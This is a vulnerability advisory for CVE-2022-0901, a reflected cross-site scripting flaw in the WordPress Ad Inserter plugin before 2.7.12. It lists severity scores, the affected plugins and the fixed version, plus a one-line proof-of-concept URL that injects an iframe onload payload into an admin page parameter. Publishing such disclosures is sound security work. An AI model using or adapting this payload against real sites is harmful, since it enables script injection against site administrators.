Taurus Omar1337DAY-ID-37598WordPress Ad Inserter Plugin < 2.7.12 - Cross Site Scripting Vulnerability
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
0.001 Low
EPSS
Percentile
50.5%
Tittle:
WordPress Plugin Ad Inserter < 2.7.12 - Reflected Cross-Site Scripting
References:
CVE-2022-0901
Author:
Taurus Omar
Description:
The plugins do not sanitise and escape the REQUEST_URI before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters
Affects Plugins:
ad-inserter
ad-inserter-pro
Fixed in version 2.7.12
Proof of Concept:
In a browser which does not encode characters:
https://example.com/wp-admin/options-general.php?page=ad-inserter.php&start=2&tab=\"><iframe/onload=alert(1)></iframe>
Classification
Type XSS
OWASP top 10 A7: Cross-Site Scripting (XSS)
CWE-79
wpScan:
https://wpscan.com/vulnerability/85582b4f-a40a-4394-9834-0c88c5dc57ba
Related
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
0.001 Low
EPSS
Percentile
50.5%